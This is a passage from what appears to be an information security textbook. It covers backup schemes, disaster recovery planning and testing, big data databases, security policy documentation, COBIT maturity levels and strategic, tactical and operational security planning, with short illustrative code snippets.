Fault-Tolerant Servers: If a primary server fails, a local backup server resumes service (active-passive clustering). An alternative is Distributed Processing: a load is distributed over multiple servers (active-active clustering), and if one server fails, the remaining server(s) attempt to carry the full load. This model is frequently used for high-volume web processing and/or firewalls.

Storage Array: A storage array is a large disk network that can support remote backups, data sharing and data migration between different geographical locations. If one site fails, recovery at a second site is possible. A storage array may perform replication via hardware or software, and may operate in synchronous or asynchronous modes. In synchronous mode, a write completes when both sites confirm the transaction. In asynchronous mode, replication occurs on a periodic, scheduled basis. An adaptive mode alternates between synchronous and asynchronous, depending on current load [10].

Network Redundancy: Redundant networks of the same or different types can survive network equipment or link failures. Networks can detect failures and reconfigure automatically via sophisticated routing protocols such as OSPF or EIGRP. Solutions are shown in Fig. 5.6 and include [10]:

• Diverse Routing: One network type (e.g., fiber or radio) supports multiple routes.
• Alternative Routing: Two network types, often with different network providers, enable redundancy. This may be implemented over the long-haul (long distance) or the last-mile (the local connection between your site and your communications provider).

Big Data databases, such as Hadoop and Mongo, also qualify as high-availability systems. This system type is described in an Advanced section of this chapter.


Fig. 5.6   Network redundancy

5.2.3 Disk Backup and Recovery

Backups are critical regardless of the type of Business Continuity solution used. Employee error, disk failures, and/or malware may corrupt disks, requiring recovery from backup. Even an on-line, redundant database backup can be corrupted via error or malevolence, requiring recovery from a historical copy. Multiple copies of historical databases should be retained, because it is sometimes necessary to reload a specific previous version in order to retrieve a deleted file or track fraud or a security attack. In addition, ransomware may corrupt backups (in addition to encrypting disks) to help convince you to pay the ransom [4]. Thus, it is important not only to perform backups, but to regularly ensure backups are functional.

One method of performing backups is the Grandfather-Father-Son method, which rotates monthly, weekly, and daily backups, respectively [3]. At the 'son' level, seven daily backups are retained. The backup for the last day of each week graduates to the 'father' level, where five weekly backups are retained covering the last month. The backup for the last week of each month graduates to the 'grandfather' level, where 12 or more monthly backups may be retained. An example of this is shown in Fig. 5.7; any level can be retained in disk or tape form.

Backups may be complete backups of a database, or can be partial backups, listing only the changes from the last backup. Partial backups may be Differential, which saves all changes since the last complete backup, or Incremental, which saves all changes since the last partial backup [3, 5, 10]. Table 5.5 shows an example, where Monday and Friday have full backups, while Tuesday through Thursday have only partial backups. If a reload must occur on Thursday and Differential backup is used, Monday's then Wednesday's backups are both reloaded. If Incremental backup is used, Monday's, Tuesday's and Wednesday's must all be reloaded. In the Grandfather-Father-Son solution, it is assumed that the Father and Grandfather levels are complete backups.


Fig. 5.7  Grandfather-father-son backup rotation

Table 5.5  Types of backup

Daily events         | Full   | Differential    | Incremental
Monday: Full backup  | Mon.   | Monday          | Monday
Tuesday: A changes   | Tues.  | Saves A         | Saves A
Wednesday: B changes | Wed.   | Saves A + B     | Saves B
Thursday: C changes  | Thurs. | Saves A + B + C | Saves C
Friday: Full backup  | Fri.   | Friday          | Friday
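The reload logic in Table 5.5 can be expressed compactly. Below is a minimal Python sketch (the function and variable names are our own) that returns which backups must be reloaded after a failure, for either partial-backup scheme.

def restore_chain(backups):
    """Return the backups to reload, in order, given (label, kind) tuples
    in chronological order, where kind is 'full', 'diff', or 'incr'.
    Assumes the sequence starts with a full backup."""
    chain = []
    for label, kind in backups:
        if kind == "full":
            chain = [(label, kind)]            # a full backup resets the chain
        elif kind == "diff":
            chain = [chain[0], (label, kind)]  # last full + newest differential
        else:  # "incr"
            chain.append((label, kind))        # keep every incremental since the full
    return chain

# Failure on Thursday, before Thursday's backup runs:
diff_week = [("Mon", "full"), ("Tue", "diff"), ("Wed", "diff")]
incr_week = [("Mon", "full"), ("Tue", "incr"), ("Wed", "incr")]
print(restore_chain(diff_week))  # [('Mon', 'full'), ('Wed', 'diff')]
print(restore_chain(incr_week))  # [('Mon', 'full'), ('Tue', 'incr'), ('Wed', 'incr')]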

Backups must be properly labeled and tracked. Labels should include: data set name, volume serial number, date created, offsite storage bin number and possibly accounting period [3]. The backup retention time should be specified by policy and implemented carefully [10]. Backups should be kept off-site in a library, which maintains a detailed inventory of storage media and files. The library site should be sufficiently far away from the main computing center to avoid being affected by any common disaster. The library should be as secure as the main computing center and, to avoid notice, should not be labeled. The library should have constant environmental control (humidity and temperature control, UPS, smoke/water detectors, and fire extinguishers) [10].

5.3 Step 4: Preparing for IT Disaster Recovery

Figure 5.8 shows how an organization should respond to a disaster. This activity diagram is like a flow chart, where tasks normally occur in order (following the arrows), but the tasks to the right of the thick middle vertical bar happen in parallel. First priority is human life and evacuating people as necessary.


Fig. 5.8  Disaster response

When there is a security committee, anyone on that committee can declare a disaster. A pre-established protocol determines what constitutes a disaster and how a security officer should react. The protocol should include using a phone tree to notify participants. IT follows the Disaster Recovery Plan to implement Alternate Mode. The public relations department is responsible for any press release, and legal counsel should advise as to liability, as appropriate. Management should be kept well-informed to make any critical decisions, including potential resource allocation decisions.

The Disaster Recovery Plan (DRP) should guide this effort for IT [10]. A full Disaster Recovery Plan should include: pre-incident readiness; a description of how to declare a disaster; evacuation procedures; allocation of responsibilities and contact information; step-by-step procedures for disaster recovery and Alternate Mode operation; and required resources for recovery and continued operations. The DRP should consider details such as: How will the Alternate Mode site be staffed? How will applications, operating systems, databases, networking, and security be brought up and made functional? Copies of the DRP must exist in hard copy off-site, available where they will be needed. Contact information should be accessible for general business needs and include first responder numbers for fire, police, and emergency health; business recovery contacts including legal, supplies, damage assessment, and salvage; and people assistance including training and transportation/relocation (for people and/or equipment). Contact information for technology needs includes: the incident response team, software/hardware vendors, insurance, recovery facilities, suppliers, and offsite media. Contact information should include name, address, email and phone information.

To ensure a speedy recovery, a crisis should be simulated by testing the business continuity plan before a failure or real crisis actually occurs. Testing should start with easy, partial tests, and proceed up to full, complete tests [2].


A good first test is the Desk-Based Evaluation/Paper Test, where a group steps through a paper procedure and mentally performs each step. The next step is a Preparedness Test, where part of a full test is performed on real systems. Different aspects should be tested regularly; one example would be a disk failure, which would require a recovery-from-backup implementation. The Full Operational Test is a simulation of a full disaster, with a complete implementation of Alternate Mode. Some of these tests may themselves cause problems; thus, the higher the level of test, the higher the level of management approval required [10]. Testing for IT's disaster recovery may include additional types of tests, including [5, 10]:

• Checklist Review: Reviews coverage of the plan. Are all important concerns covered?
• Structured Walkthrough: Reviews all aspects of the plan, often walking through different scenarios.
• Simulation Test: Executes the plan based upon a specific scenario, without the alternate site.
• Parallel Test: Brings up the alternate off-site facility, without bringing down the regular site.
• Full-Interruption Test: Moves processing from the regular site to the alternate site.

Metrics analyzed after IT testing may include measurements of the time taken to transition to Alternate Mode, the amount of data processed, the accuracy of processing, and the percentage of systems functional in Alternate Mode [10]. A plan for testing would define when to perform which tests and the objectives of each test. Teams should be encouraged to work from the plan and not from memory, and to document their actions along the way [2]. Three test stages are recommended [10]:

1. Pre-Test: The test is set up. During Pre-Test, the staff may be prepared and equipment (e.g., for the alternate off-site facility) set up.
2. Test: The test occurs.
3. Post-Test: Consists of analysis, cleanup and improvement. Post-test analysis includes calculating metrics, such as the time required to complete the test, the percent success rate in processing, and the ratio of successful transactions in Alternate versus normal mode. Cleanup involves returning resources and deleting any test data. Improvement incorporates updating the disaster response plans and test plans.

As each test is executed, it should be evaluated for improvements. Both test and DRP procedures can potentially be improved. What went wrong? How can the procedure be completed faster? What needs to be corrected in the procedure? An internal auditor (or other third party) can help by observing and documenting what occurred. This documentation is useful during the analysis process and in external audits. As a result of testing, a gap analysis defines where the organization currently performs, compared to the desired level of performance.


To achieve the desired level, improvements may require additional equipment or staff involvement, and better training and communication.

To summarize this chapter, the BIA-BC process is:
1. Perform a Business Impact Analysis, which prioritizes services to support critical business processes.
2. Define an Alternate Processing Mode to support these Critical and Vital services following a disruptive event.
3. Develop a Business Continuity Plan to support business operations during this recovery period.
4. Develop a Disaster Recovery Plan, which guides IT systems recovery into Alternate Mode.
5. Test the plans to ensure they are functional and will work.
6. Periodically maintain the plans, to ensure that they adapt as the business changes.

5.4 Advanced: Business Continuity for Mature Organizations

Sophisticated organizations that rely heavily on IT should monitor availability metrics, extend documentation, consider purchasing insurance, and prepare with additional testing. Monitoring availability/reliability rates can determine whether IT is meeting business goals for availability. Businesses advertise their availability as '24/7': 24 hours a day, 7 days a week. Some strive to be (for example) a 'five 9's' service, meaning the service is up and available 99.999% of the time. Figure 5.9 illustrates the underlying reliability metrics: the average time a device runs successfully until failure (Mean Time To Failure, MTTF), and the average time it takes to fix it (Mean Time To Repair, MTTR). Mean Time Between Failures (MTBF) is the sum of the two: MTBF = MTTF + MTTR.

Multiple Business Continuity Plans may be useful for large organizations, as shown in Table 5.6 [3]. The three IT plans are shown in the middle column, and include the Disaster Recovery Plan, IT Contingency Plan, and Cyber Incident Response Plan. The Incident Response chapter describes this third plan at length. Business plans (right column) include event handling plans to handle aspects of a crisis, and business continuity plans, which describe business operations in a survival (Alternate) mode.

Fig. 5.9 MTBF = MTTF + MTTR
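As a quick check on these figures, here is a small Python sketch of the availability arithmetic; the MTTF and MTTR inputs are made-up illustrative values.

def availability(mttf_hours, mttr_hours):
    # Fraction of time the service is up: MTTF / (MTTF + MTTR) = MTTF / MTBF
    return mttf_hours / (mttf_hours + mttr_hours)

# A server that runs 10,000 hours between failures and takes 2 hours to repair:
print(f"{availability(10_000, 2):.4%}")  # 99.9800%, short of 'five 9's'

# Allowed annual downtime for a 99.999% ('five 9's') service:
print(f"{365 * 24 * 60 * (1 - 0.99999):.1f} minutes per year")  # about 5.3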


Table 5.6  Plans associated with business continuity

Event recovery, IT-focused:
• Disaster recovery plan: Procedures to recover at an alternate site
• IT contingency plan: Recovers a major application or system
• Cyber incident response plan: Handles a malicious cyber incident

Event recovery, business-focused:
• Business recovery plan: Recover business after a disaster
• Occupant emergency plan: Protect life and assets during a physical threat
• Crisis communication plan: Provide status reports to public and personnel

Business continuity, business-focused:
• Business continuity plan: Operate business in alternate mode
• Continuity of operations plan: Longer-duration outages

Table 5.7  Types of business continuity insurance

Information processing facility (IPF) and equipment:
• Business interruption: Loss of profit due to IT interruption
• Extra expense: Extra cost of operation following IPF damage
• IS equipment & facilities: Loss of IPF & equipment due to damage
• Cybersecurity: Coverage for cyber-attacks

Data and media:
• Valuable papers & records: Covers cash value of lost/damaged papers & records
• Media (software) reconstruction: Cost of reproduction of media
• Media transportation: Loss of data during transport

Employee damage:
• Fidelity coverage: Loss from dishonest employees
• Errors & omissions: Liability for an error resulting in loss to a client
• Professional/commercial liability: Covers third-party claims of losses

Table 5.7 shows different types of insurance that can help contain major expenses due to a disaster, categorized by protection type: the Information Processing Facility (IPF) and equipment, data and media, or employee damage ([10], with two additional entries: Cybersecurity and Professional/Commercial Liability).

Auditors of business continuity should investigate a number of issues [3]. Are documents (BIA/BC/DRP) complete, fully featured, well detailed, accurate, in line with business goals, and current? Is it clear who is responsible for what in the BC/DRP plans, and are those people happy, trained, and competent in their jobs? Is the backup site properly maintained and fully functional?


Were DRP test plans executed, results analyzed, and corrections made? Is the BCP phone tree current, and do BC/DRP personnel have copies of required documents off-site? If used, does the hot site have correct copies of software? Internal and external auditors may use these questions to ensure preparedness.

5.5 Advanced: Considering Big Data Distributed File Systems

Reliability can be provided using Big Data databases: quick-access distributed databases that can handle large volumes of data, at terabyte and petabyte scale. The advantages of the big data databases discussed here include their horizontal scalability, which enables easy expansion by adding commodity servers, and replicated servers, which automatically allocate and store data across multiple servers [6, 7]. However, these databases are noSQL servers; they support only the equivalent of a subset of SQL commands and queries. They do not support SQL joins, for example. Also, while they are great at reliability, they are not known for their confidentiality or integrity security features. Therefore, these aspects must be carefully considered, when necessary. This section considers two popular databases: Hadoop and MongoDB.

Hadoop is a popular database to support Big Data [8]. It is designed for large volumes, quick access, complex data mapping, and reliability through redundancy. Hadoop is an Apache distributed database, which replicates and distributes its data across multiple locations and reconfigures itself automatically following a failure. It can be built with standard hardware. Hadoop's two main components are MapReduce and the Hadoop Distributed File System (HDFS), which originated with Google versions. MapReduce handles requests for data operations, which are managed by a Job Tracker across nodes/clusters. The HDFS consists of Name Nodes, which track where information resides, and Data Nodes, which actually contain the data. Job Trackers and Name Nodes achieve reliability by relaunching requests and redistributing data, respectively, following a failure in communication to any node.

Sometimes Hadoop is used as a backend database, with MySQL or HBase used as a front-end interface. MySQL supports SQL queries to handle complex queries, but is slow in a high-volume big data environment. HBase is a noSQL server supporting scalability and reliability through redundancy [9]. HBase uses a log-structured merge (LSM) tree to track data, which offers improved performance over Hadoop alone when a high portion of transactions are inserts and/or random access requests. HBase also offers additional query and analysis capabilities beyond MapReduce, but fewer than MySQL.
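To make the MapReduce idea concrete, here is a conceptual Python sketch. It simulates the programming model in a single process; it is not the Hadoop API, where the map and reduce tasks run distributed across Data Nodes.

from collections import defaultdict

def map_phase(document):
    # Map: emit a (key, value) pair for every word in the document
    return [(word, 1) for word in document.split()]

def reduce_phase(pairs):
    # Reduce: combine the values of all pairs that share the same key
    counts = defaultdict(int)
    for word, n in pairs:
        counts[word] += n
    return dict(counts)

docs = ["big data is big", "data nodes hold the data"]
pairs = [pair for doc in docs for pair in map_phase(doc)]
print(reduce_phase(pairs))  # {'big': 2, 'data': 3, 'is': 1, ...}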


MongoDB is a free document-oriented database that is used by MTV, Forbes, the NY Times and Craigslist [6]. The NY Times uses MongoDB to rapidly store and retrieve photos. MongoDB orders groups of items into 'collections', which can be retrieved by collection name. These collections can then be sorted and filtered on specific field names, such as 'lastname'. Commands to access the database include: insert/save, find, update, remove, and drop, where each is executed as a function call passing records' field name and value pairs, and can include comparison attributes. MongoDB is faster than traditional databases for larger batches of data, but cannot perform complex data joins.
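For illustration, the commands above look roughly like this from Python's pymongo driver, assuming a MongoDB server on localhost; the database, collection, and field names here are hypothetical.

from pymongo import MongoClient

client = MongoClient("mongodb://localhost:27017")
photos = client["newsroom"]["photos"]            # database -> collection

photos.insert_one({"lastname": "Doe", "title": "Flood coverage"})
for doc in photos.find({"lastname": "Doe"}):     # filter on a field name
    print(doc["title"])

photos.update_one({"lastname": "Doe"}, {"$set": {"archived": True}})
photos.delete_one({"lastname": "Doe"})
photos.drop()                                    # remove the entire collection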

5.6 Questions

For each of the following questions, be sure to write professionally in typed, essay form.

1. Vocabulary. Match each meaning with the correct vocabulary name: Alternate mode, Sensitivity class, Criticality class, Active-active cluster, Disaster recovery plan, Interruption window, Business impact analysis, Active-passive cluster, Recovery point objective, Incident response plan, Recovery time objective, Storage array.

(a) A level of partial IT service provided as a backup mode, following a major IT failure and emergency recovery.
(b) The duration of no service following an IT failure.
(c) Following a major IT failure, IT uses this backup plan to resume a partial level of service.
(d) The determination of which IT business functions are most critical to the organization.
(e) The amount of information that can be lost following an IT failure; equivalent to lost data since the last backup.
(f) The permitted amount of time a business function may be nonoperational following an IT failure.
(g) A set of categories delineating the criticality of business functions.
(h) A high-availability processing solution, where processing happens in multiple servers simultaneously, enabling load sharing.
(i) A high-availability processing solution, where a standby takes over when a primary processor fails.
(j) A high-availability storage solution that enables synchronous and/or asynchronous transaction updates with remote sites.

2. Workbook Solution for Specific Industry. Consider an industry you currently work in or would like to work in. Assume the company is in your geographical region and is NOT a university. You may use the Security Workbook (at https://sn.pub/lecturer-material), Business Continuity chapter, to complete the tables. For each table, include at least four business processes.


(a) Create an Impact Classification table, similar to Table 5.1.
(b) Create a BIA table, similar to Table 5.2.
(c) Create an RPO Controls table, similar to Table 5.3.
(d) Create a BC Overview table, similar to Table 5.4.

3. Procedure Development. Write a backup/recovery procedure for your computer’s data that will enable anyone with your procedure to accomplish the operation. A procedure is a step-by-step description of how to perform an action (similar to the Security Workbook). You may save data to a DVD or electronic drive. Answer the following questions in your Backup procedure: How do you initialize the backup? How do you label the backup? What data will you move, where is that data, and how do you move it? What problems might occur and how should they be handled? Also prepare a similar Recovery procedure, indicating how to reload from backup.

5.6.1 Health First Case Study Problems

For each case study problem, refer to the Health First Case Study. The Health First Case Study and Security Workbook should be provided by your instructor or can be found at https://sn.pub/lecturer-material.

Case study: Addressing business impact analysis and business continuity. Health First case study: ✓. Other resources: Security Workbook.

References

1. NYTimes (2021) Quotation of the day: pipeline hack reveals seams in nation's cybersecurity armor. NY Times, May 14
2. ISACA (2015) CISM® review manual, 15th edn. ISACA, Arlington Heights
3. ISACA (2010) CISA review manual 2011. ISACA, Arlington Heights, pp 121–132, 295–305
4. Verizon (2013) Verizon 2013 data breach investigations report. http://www.verizonenterprise.com/DBIR/2013. Accessed 20 Oct 2013
5. Harris S (2013) All-in-one CISSP® exam guide, 6th edn. McGraw-Hill Co., New York, pp 885–972
6. Boicea A, Radulescu F, Agapin LI (2012) MongoDB vs Oracle – database comparison. In: Third international conference on emerging intelligent data and web technologies. IEEE, pp 330–335. http://ieeexplore.ieee.org
7. Vora MN (2011) Hadoop–HBase for large-scale data. In: International conference on computer science and network technology (ICCSNT), vol 1. IEEE, pp 601–605. http://ieeexplore.ieee.org


8. Singh K, Kaur R (2014) Hadoop: addressing challenges of big data. In: IEEE international advance computing conference (IACC). IEEE, pp 686–689. http://ieeexplore.ieee.org
9. Ding H, Jin Y, Cui Y, Yang T (2012) Distributed storage of network measurement data on HBase. In: IEEE 2nd international conference on cloud computing and intelligent systems. IEEE, pp 716–720. http://ieeexplore.ieee.org
10. ISACA (2019) CISA review manual, 27th edn. ISACA, Arlington Heights

Chapter 6

Governing: Policy, Maturity Models and Planning

Defendants made false and/or misleading statements and/or failed to disclose that: (1) Twitter knew about security concerns on their platform; (2) Twitter actively worked to hide the security concerns from the board, the investing public, and regulators; (3) contrary to representations in SEC filings, Twitter did not take steps to improve security; (4) Twitter’s active refusal to address security issues increased the risk of loss of public goodwill; and (5) as a result, Defendants’ statements about Twitter’s business, operations, and prospects, were materially false and misleading and/or lacked a reasonable basis at all relevant times. – Baker vs. Twitter (Lawsuit) Complaint [1, p. 12]

Executive-level management is responsible for strategic business goals (including for IT/security), managing risk, defining policies for the organization, and staffing security. The previous two chapters addressed risk, including the chapter on Business Impact Analysis. This chapter addresses the remaining executive management responsibilities. Depending on whether you like to work from the top down or bottom up (theory versus details), or whether your interests are mainly technical or business-oriented, this chapter may be completed before or after the Tactical Security Planning chapters. If you have little knowledge of security technology, and you plan to work with Policy in the Security Workbook, you may find you have better security knowledge after completing the Tactical Planning section.

6.1 Documenting Security: Policies, Standards, Procedures and Guidelines

Security is a large, complex system. To implement effective security requires attention to technology, physical security, and administrative (or people) issues. Working with one security area will impact other areas. For example, aspects of business continuity impact information security, which impacts network and physical security. All areas impact metrics and personnel security, since roles must be coordinated and permissions controlled. It takes a lot of documentation to plan this sophisticated system, train staff, and provide a knowledge database for staff.


Documentation for security includes policies, procedures, standards and guidelines [3, 4]; see Fig. 6.1.

Policies are management directives. Policies do not describe how something will be achieved, but they do direct that something be accomplished. Policies may be high level or detailed. The Security Workbook has a chapter with proposed policies that may be edited for your organization. Examples of high-level policies are shown here:

• Risks shall be managed utilizing appropriate controls and countermeasures to achieve acceptable levels at acceptable costs.
• Monitoring and metrics shall be implemented, managed, and maintained to provide ongoing assurance that all security policies are enforced and control objectives are met.

Standards are a detailed implementation of a policy. Standards are mandatory and are often described with the word 'shall' to indicate a requirement. Examples of standards might include the list of permitted software on a computer; the required length and attributes of a password; and the format of a backup disk label.

Procedures are a description of "how to" complete a task. A procedure often includes numbered steps to complete a task. Examples of procedures might include how to perform a disk backup; how to complete a multi-step test for a security audit; or steps to take when a hacker attack is detected. The Security Workbook is a series of procedures, guiding the reader in designing security.

Guidelines are recommendations that should be followed; in some cases, guidelines may not apply. Guidelines are often written with the word 'should' to indicate a recommendation. Examples of guidelines might be how to create a password (e.g., use the first letter of three lines of a song), or which websites you are permitted to access at work. This textbook is a guideline: it tells you how to do things, but it is up to you as to what you actually choose to do.

Fig. 6.1  Policies, procedures, standards, and guidelines


The choice of language in writing policies is important. The word shall indicates a mandatory requirement, and may be specified to ensure proper or required operation [8]. Should denotes a recommended approach, often used within a guideline. May indicates a permitted approach or action, where no recommendation is suggested. Might suggests a possibility; while it is useful in a risk document, it is not recommended in a policy document.

Some policy documents contain detailed policies, which could also be described as standards. They include:

• Acceptable Usage Policy: Describes permissible usage of IT equipment/resources
• End-User Computing Policy: Defines usage and parameters of desktop tools
• Access Control Policies: Define how access permissions are defined and allocated
• Data Classification: Defines data security categories, ownership and accountability

The Acceptable Use and/or End-User Computing Policies are normally signed by employees to indicate that they have read the documents. You will create a Data Classification policy as part of the Information Security chapter. After policy documents are created, they must be officially reviewed/accepted, maintained, disseminated, and tested for compliance. The security function is toothless and severely handicapped without a good set of management-supported policy documentation.

6.2 Maturing the Organization via Capability Maturity Models and COBIT

Executive management must decide security policies for the organization, but must also understand the maturity level of its IT/security organization. Does the organization understand security? What aspects of security do we do well, and not so well? Are we dependent on key people remaining with the organization for our security implementation? Do we know how much security costs us, and how well we actually perform? These are some of the questions management should know the answers to.

A Capability Maturity Model helps an organization understand how it performs relative to a standard. There are two well-known Capability Maturity Models related to IT/security: the COBIT model and the Systems Security Engineering Capability Maturity Model (SSE-CMM). The SSE-CMM was adopted by the International Organization for Standardization (ISO) as ISO/IEC Standard 21827. ISO additionally publishes a set of security standards from ISO/IEC 27000 to 27050. These standards address basic security, topical areas (e.g., risk, audit, network security) and industries (e.g., finance, energy utilities). The COBIT model was developed to help organizations achieve Sarbanes-Oxley compliance


(Sarbanes-Oxley is American regulation meant to prevent financial statement fraud at companies listed on an American stock exchange; this matters for protecting the value of the company's stock to investors.) Figure 6.2 shows the maturity levels for the COBIT model, which are consistent with the Capability Maturity Model Integration (CMMI) international standard [6]. The SSE-CMM and COBIT are similar in nature. One main difference between COBIT and this text is that this text focuses on basic security planning, whereas COBIT®2019 addresses a model of full IT/IS maturity. For full implementation of COBIT®2019, see ISACA's reference: COBIT 2019 Framework: Introduction and Methodology. Additional detailed "COBIT Focus on" references are available for small and medium enterprises, information security, DevOps, and information and technology risk.

An organization might start at Level 0 Incomplete Process. Organizations at this level may be doing some or considerable IT/security practices. However, the practices are not fully defined and implemented, nor are they documented. What is done is accomplished by competent individuals.

Level 1 Initial Process occurs when many security goals are functional, even if informally achieved. For example, when this full textbook is read, understood, and implementation is started, an organization would be at Level 1, using this text as a standard (not to be confused with adhering to COBIT). However, the text can be implemented without the Security Workbook being fully documented. This would mean that if up-to-speed staff left, the new staff would need to read the textbook and discuss implementation with others.

Level 2 Managed Process means that the organization uses project management and configuration management to manage projects. Plans are documented with schedules: for example, security enhancement and compliance testing (or audit) projects are scheduled and managed. Projects result in work product documents, which are evaluated before acceptance.

Fig. 6.2  Capability maturity model integration [6]


Work product documents are maintained in a library (also known as configuration management), where previous versions are accessible and controlled. Thus, security documentation is partially developed; if key people leave, some key process knowledge will be lost.

Level 3 Defined Process means that security policies, standards, procedures, and guidelines are fully documented and implemented across the organization. The organization has not only completed the Security Workbook's Chapter 2 Strategic Security Plans and Chapter 3 Tactical Security Planning, but has also completed Chapter 5 Operational Security Plans. Chapter 5 includes all the technical procedures to implement backup/reload, incident response procedures, etc. This complete documentation is followed by the organization. If key people leave, new people can easily follow the directions of existing organizational documentation.

Level 4 Quantitative Process is achieved when we maintain a set of metrics to measure how our security actually performs. Do you know how many hacker attacks you defend against monthly, and how many attacks succeed? When the Metrics chapter of this book is seriously used to understand security compliance and effectiveness, and these security metrics achieve organizational goals, then the organization has achieved Level 4.

Level 5 Optimizing Process sets objectives for security metrics to achieve business goals. For example, fraud may eat 5% of organizational income, and the organization would like to reduce this number to 2% or less. Since the organization knows the full level of fraud, security attacks, and security costs, and desires improved performance for business reasons, new goals are periodically set and projects aim to achieve higher effectiveness.

Achieving higher levels of COBIT is complex not only from the maturity perspective, but also from a breadth perspective. At a high level, COBIT®2019 has five domains: (1) Evaluate, Direct and Monitor; (2) Align, Plan and Organize; (3) Build, Acquire and Implement; (4) Deliver, Service and Support; and (5) Monitor, Evaluate and Assess [6]. Thus, COBIT covers information security in addition to other topics, such as managing service agreements, suppliers, quality, change, capacity, software builds, knowledge, operations, budget and costs, etc. Within these five domains, COBIT®2019 addresses 40 objectives in total [6]. Each objective contains a set of practices, which in turn contain a set of activities. For example, the "Manage Security Services" objective contains objective-practices, including "Protect against malware". This practice in turn contains five activities, including "Communicate malicious software awareness and enforce prevention procedures and responsibilities…" [7].

Achieving even COBIT Level 1 is quite an accomplishment. One way to measure progress toward this goal is to create a chart listing the 40 objectives, and grading your implementation of each as N = Not achieved: 0–15% fulfillment; P = Partially achieved: 15–50% fulfillment; L = Largely achieved: 50–85% fulfillment; and F = Fully achieved: 85–100% fulfillment [2].

There is security documentation for all levels. This book and workbook are a security planning tool, which addresses security from a high level. Maturity models help organizations understand where they fall in managing security.
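As a minimal sketch of the grading chart just described, the N/P/L/F bands can be computed in code; the objective names and fulfillment percentages below are hypothetical, not drawn from an actual assessment.

    def grade(fulfillment: float) -> str:
        """Map a fulfillment percentage to the N/P/L/F rating scale [2]."""
        if fulfillment < 15:
            return "N"  # Not achieved: 0-15%
        if fulfillment < 50:
            return "P"  # Partially achieved: 15-50%
        if fulfillment < 85:
            return "L"  # Largely achieved: 50-85%
        return "F"      # Fully achieved: 85-100%

    # Hypothetical self-assessment for a few of COBIT's 40 objectives
    assessment = {
        "Manage Security Services": 40.0,
        "Manage Risk": 70.0,
        "Manage Service Agreements": 10.0,
    }
    for objective, pct in assessment.items():
        print(f"{objective}: {pct:.0f}% -> {grade(pct)}")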


Other documentation helps with the technical details of how to implement specific security functions, including ISO/IEC 27001 and subsequent ISO documents, NIST documents, and security websites such as SANS. Security experts, such as Security+, CISSP, CEH and CISA certified professionals, can help to configure and test security settings.

6.3 Strategic, Tactical and Operational Planning

IT and information security should fit within the business plans of the organization. Strategic planning is decided at the executive level. Executives consider long-term (3–5 year) planning, which includes organizational goals and regulatory compliance (and, for IT, technical advances). The tactical plan takes the strategic plan and defines what needs to be accomplished in the next year to achieve strategic goals. Operational-level plans are detailed or technical plans used to implement the tactical plan.

Examples of strategic plan items might be: incorporate the business; market the new Super-Widgit product; or achieve COBIT Level 1. Assuming the third goal, a tactical plan might define which key areas in COBIT the organization plans to address in the first year, and what might be due each quarter (March, June, September, December). An operational plan would describe the intermediate deadlines, deliverables, and key persons responsible for the tactical goals. By allocating responsibility to specific people, setting dates and naming clear deliverables, progress can be determined and measured. For larger projects, project management may involve many tasks and people. In this case, PERT and Gantt chart tools can be used to organize people (resource allocation), task deliverables and due dates.

An example of such planning for a business considering incorporation is shown in Fig. 6.3. Passing an external audit (at the strategic level) requires performing risk analysis, performing Business Impact Analysis, and defining policies, which are the tactical goals for the first year. The operational plan starts the detailed task allocation to accomplish the tactical goals. Normally operational goals involve low-level managers, but in this case the organization is just starting out, and upper management must hire the appropriate people.

The development of the best security is a joint responsibility of the information security function and the business function. Business ensures that the security program is in alignment with business objectives. Security helps the business side understand various threats and risks. Business knows which assets to protect, while security knows how to protect them. When things go awry, business sets the priorities, which security implements. Security will lead the efforts and do much of the detailed security work; business helps to define administrative controls, but must also adhere to these controls. Thus, it is critically important that the business and security functions plan security together. Figure 6.4 lists the steps involved in the security development process. Note that arrows pointing to the data or people show where the data or committee is created. Arrows pointing to the process show where the data or people are used as input to the process.
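A minimal sketch of tracking an operational plan in code follows, using entries from Fig. 6.3; the dates, completion flags, and the idea of automating the overdue check are illustrative assumptions, not part of the workbook.

    from dataclasses import dataclass
    from datetime import date

    @dataclass
    class OperationalObjective:
        objective: str
        responsibility: str
        deliverable: str
        due: date
        done: bool = False

    plan = [
        OperationalObjective("Hire an internal auditor and security professional",
                             "VP Finance", "New employees hired", date(2024, 2, 1)),
        OperationalObjective("Establish security team of business, IT, personnel",
                             "VP Finance & CIO",
                             "Steering committee has one meeting", date(2024, 3, 1)),
    ]

    # Progress can be determined and measured: list overdue, unfinished items
    today = date(2024, 2, 15)
    for item in plan:
        if not item.done and item.due < today:
            print(f"OVERDUE: {item.deliverable} ({item.responsibility})")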


Fig. 6.3  Strategic, tactical and operational planning (workbook exercise):

Strategic Plan (Objective | Time frame):
  Incorporate the business | 5 yrs
  Pass an external audit | 4 yrs

Tactical Plan (Objective | Time frame):
  Perform risk analysis | 6 mos.
  Perform BIA | 1 yr
  Define policies | 1 yr

Operational Plan (Objective | Responsibility | Deliverable | Timeframe):
  Hire an internal auditor and security professional | VP Finance | New employees hired | Feb 1
  Establish security team of business, IT, personnel | VP Finance & Chief Info. Officer (CIO) | Info Sec. Steering Committee has one meeting; people are committed | March 1
  Team initiates risk analysis and prepares initial report | CIO & Security Steering Committee | Document: Security Issues | April 1

Fig. 6.4  Introducing security to an organization

The best method to introduce security into an organization, and align information security with business, is to create an Information Security Steering Committee. This committee is made up of security and business management. First, an organization chart will identify potential key players that should be befriended. Various stakeholders are interviewed to determine important assets, threats, security issues and security regulation. These issues are combined into a Security Issues document.


Many of the key people expressing interest and concern can be invited to become part of the Information Security Steering Committee. This committee can then develop a set of Security Policies from the Security Issues, which are presented to management for review and approval. Once approved, the steering committee uses the Security Policies to develop security training materials and compliance test plans. After cycling through training and testing, the steering committee can perfect training and testing materials.

6.4 Allocating Security Roles and Responsibilities

Larger organizations will have many people involved in the security process. Executive and business management have important part-time roles in security [3–5]. Without their interest, the security organization will have a hard time being effective. The Board of Directors is responsible for reviewing risk assessment and Business Impact Analysis results, ensuring adherence to regulation, and defining the tone from the top, including penalties for non-compliance with policies. Executive management's concerns with security include complying with regulation, limiting liability, instituting policy, and controlling risk. They are responsible for instituting a security organization and monitoring its performance through measurements or metrics.

